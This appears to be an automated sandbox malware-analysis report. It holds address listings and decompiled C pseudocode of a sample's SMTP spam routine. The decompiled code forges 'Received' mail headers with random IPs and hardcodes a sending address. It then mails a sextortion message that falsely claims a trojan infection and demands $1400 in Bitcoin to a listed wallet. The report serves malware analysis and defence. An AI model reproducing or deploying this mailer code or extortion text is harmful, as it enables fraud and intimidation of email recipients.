                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea2015
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2051
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea208d
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20c9
                                                                                                                                                                                                                                                                                    0x00ea20e1
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea2104
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2140
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea217c
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21b8
                                                                                                                                                                                                                                                                                    0x00ea21d0
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f9
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea2211
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1C37
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: closesocketlstrlensendshutdownwsprintf
                                                                                                                                                                                                                                                                                    • String ID: RCPT TO: <%s>
                                                                                                                                                                                                                                                                                    • API String ID: 1492768164-1854338671
                                                                                                                                                                                                                                                                                    • Opcode ID: c72dbfac24d8a889cc28cda5dfb933e6edc3237485f1cd0cdcecc41d4ab57aa7
                                                                                                                                                                                                                                                                                    • Instruction ID: 398d08de841cf22558d62e500633e141d0c14e2f1beaf3318078ac99d80b23b3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c72dbfac24d8a889cc28cda5dfb933e6edc3237485f1cd0cdcecc41d4ab57aa7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67113DB5D00218DFCF10CBA4DC45BEEB7B4BB9D348F0051A9E6097A150E7786994CF64
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 288 ea1c7c-ea1c91 call ea1120 291 ea1c9f-ea1ca6 288->291 292 ea1c93-ea1c9a 288->292 293 ea220c 291->293 292->293 295 ea1a9a-ea1a9e 293->295 296 ea2211-ea222d shutdown closesocket 293->296 295->296 298 ea1aa4-ea1ab4 call ea1160 295->298 299 ea2233-ea2239 296->299 301 ea1ab9-ea1ac9 298->301 302 ea1acb 301->302 303 ea1ad0-ea1aef call ea11c0 301->303 302->296 306 ea1af1 303->306 307 ea1af6-ea1b15 303->307 306->296 307->293 308 ea1b1b 307->308 308->293
                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E00EA1C7C(void* __eflags) {
                                                                                                                                                                                                                                                                                    				void* _t166;
                                                                                                                                                                                                                                                                                    				intOrPtr _t170;
                                                                                                                                                                                                                                                                                    				void* _t171;
                                                                                                                                                                                                                                                                                    				void* _t192;
                                                                                                                                                                                                                                                                                    				void* _t194;
                                                                                                                                                                                                                                                                                    				void* _t195;
                                                                                                                                                                                                                                                                                    				void* _t197;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					_t166 = E00EA1120( *((intOrPtr*)(_t192 - 0x1c)), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                                    					if(_t166 != 0) {
                                                                                                                                                                                                                                                                                    						 *(_t192 - 0x20) = 6;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					while( *(_t192 - 0x20) != 0 &&  *(_t192 - 0x20) != 8) {
                                                                                                                                                                                                                                                                                    						_t170 = E00EA1160( *((intOrPtr*)(_t192 - 0x1c)), _t192 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                                    						_t197 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t192 - 0x90)) = _t170;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t192 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                                                    							 *((char*)(_t192 +  *((intOrPtr*)(_t192 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    							_t171 = E00EA11C0(_t192 - 0x490);
                                                                                                                                                                                                                                                                                    							_t195 = _t197 + 4;
                                                                                                                                                                                                                                                                                    							if(_t171 != 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *(_t192 - 0x718) =  *(_t192 - 0x20);
                                                                                                                                                                                                                                                                                    								 *(_t192 - 0x718) =  *(_t192 - 0x718) - 1;
                                                                                                                                                                                                                                                                                    								if( *(_t192 - 0x718) > 6) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								switch( *((intOrPtr*)( *(_t192 - 0x718) * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    									case 0:
                                                                                                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                                                                                                    										_push("ESMTP");
                                                                                                                                                                                                                                                                                    										if(StrStrA(_t192 - 0x490) == 0) {
                                                                                                                                                                                                                                                                                    											_t175 = wsprintfA(_t192 - 0x490, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x494) = _t175;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t178 = wsprintfA(_t192 - 0x490, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x494) = _t178;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t177 = E00EA1120( *((intOrPtr*)(_t192 - 0x1c)), _t192 - 0x490,  *(_t192 - 0x494)); // executed
                                                                                                                                                                                                                                                                                    										_t195 = _t198 + 0xc;
                                                                                                                                                                                                                                                                                    										if(_t177 != 0) {
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x20) = 3;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 1:
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 2:
                                                                                                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 3:
                                                                                                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 4:
                                                                                                                                                                                                                                                                                    										goto L0;
                                                                                                                                                                                                                                                                                    									case 5:
                                                                                                                                                                                                                                                                                    										L24:
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                                    										E00EA1320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__ebp - 0x710 = E00EA1490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                                    										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xd2;
                                                                                                                                                                                                                                                                                    										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                                    										E00EA1390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                                    											E00EA1320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    												__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    												if(__eax != 0) {
                                                                                                                                                                                                                                                                                    													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    													if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                                    														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    														__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    														if(__eax != 0) {
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                                    															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    															__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    															if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                                    																E00EA1320(__ecx, 6, __ecx) = E00EA1320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                                    																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    																if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																	if(E00EA1120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																		__eax = E00EA1120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																		if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcpy(__ebp - 0x610, "Hello there!\r\n\r\n") = strcat(__ebp - 0x610, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcat(__ebp - 0x610, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																			__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																			if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				memset(__ebp - 0x610, 0, 0x104) = strcpy(__ebp - 0x610, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				strcat(__ebp - 0x610, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																				if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                                                                    																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 6:
                                                                                                                                                                                                                                                                                    										L47:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L49:
                                                                                                                                                                                                                                                                                    					 *(_t192 - 8) = 0 |  *(_t192 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                                    					__imp__#22( *((intOrPtr*)(_t192 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t192 - 0x1c)));
                                                                                                                                                                                                                                                                                    					return  *(_t192 - 8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c8c
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad0
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af6
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b1b
